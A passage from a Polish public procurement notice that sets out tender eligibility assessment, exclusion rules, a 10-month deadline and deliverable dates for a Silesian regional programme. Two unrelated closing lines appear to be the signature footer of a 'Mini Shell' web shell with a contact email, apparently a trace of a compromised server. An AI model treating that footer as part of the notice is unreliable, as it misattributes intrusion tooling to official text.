2. Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt III.4.2). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.    
Ww. warunek każdy z podmiotów oferty wspólnej musi spełniać odrębnie.
3. Termin wykonania zamówienia:
1) Przedmiot zamówienia zostanie zrealizowany w terminie do 10 miesięcy od dnia zawarcia umowy (w tym 2 miesiące przewidziano na procedurę przyjęcia ostatecznej wersji przez Sejmik Województwa Śląskiego oraz przeszkolenie pracowników Urzędu Marszałkowskiego Województwa Śląskiego) wraz z dostarczeniem kompletu materiałów przyjętych przez Sejmik Województwa Śląskiego.
2) Wykonawca uzgodni z Zamawiającym i przedłoży: 
- projekt powiadomienia o przystąpieniu do opracowania projektu Programu i zorganizowaniu wstępnego spotkania informacyjnego wraz z rozdzielnikiem w terminie 7 dni od dnia zawarcia umowy,
- szczegółowy harmonogram realizacji poszczególnych etapów zamówienia w terminie 14 dni od dnia zawarcia umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com